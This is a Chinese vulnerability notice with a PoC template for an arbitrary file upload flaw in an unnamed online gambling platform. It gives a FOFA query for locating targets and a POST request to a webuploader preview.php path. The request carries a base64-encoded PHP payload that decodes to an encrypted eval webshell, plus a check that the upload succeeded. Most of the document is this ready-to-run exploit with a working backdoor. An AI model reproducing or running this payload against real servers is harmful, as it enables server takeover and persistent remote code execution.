漏洞描述
网络赌博是指通过互联网手段(非法赌博网站、博彩App、微信群等)进行的赌博活动。由于网络赌博不合法,资金不受法律保护,有很多“出老千”的行为,很多人被骗后往往不敢报警,导致家破人亡,所以打击赌博,刻不容缓。某菠菜系统系统存在任意文件上传漏洞,攻击者通过漏洞可以上传木马文件,导致服务器失陷。
fofa-query: body="main.e5ee9b2df05fc2d310734b11cc8c911e.css"
bocai-anyfile-upload: 某菠菜 任意文件上传漏洞(0day)
PoC代码[已公开]
id: bocai-anyfile-upload
info:
name: 某菠菜 任意文件上传漏洞(0day)
author: daffainfo
severity: critical
verified: false
description: |
网络赌博是指通过互联网手段(非法赌博网站、博彩App、微信群等)进行的赌博活动。由于网络赌博不合法,资金不受法律保护,有很多“出老千”的行为,很多人被骗后往往不敢报警,导致家破人亡,所以打击赌博,刻不容缓。某菠菜系统系统存在任意文件上传漏洞,攻击者通过漏洞可以上传木马文件,导致服务器失陷。
fofa-query: body="main.e5ee9b2df05fc2d310734b11cc8c911e.css"
reference:
- https://mp.weixin.qq.com/s/q7rSG_sAMmbd5o6m532arg
rules:
r0:
request:
method: POST
path: //statics/admin/webuploader/0.1.5/server/preview.php
headers:
Dnt: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMT
If-None-Match: "63154eb6-273"
Te: trailers
body: |
data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==
expression: response.status == 200 && "webuploader/0.1.5/server/(.*).php".bmatches(response.body) && response.body.bcontains(b'"id"')
expression: r0()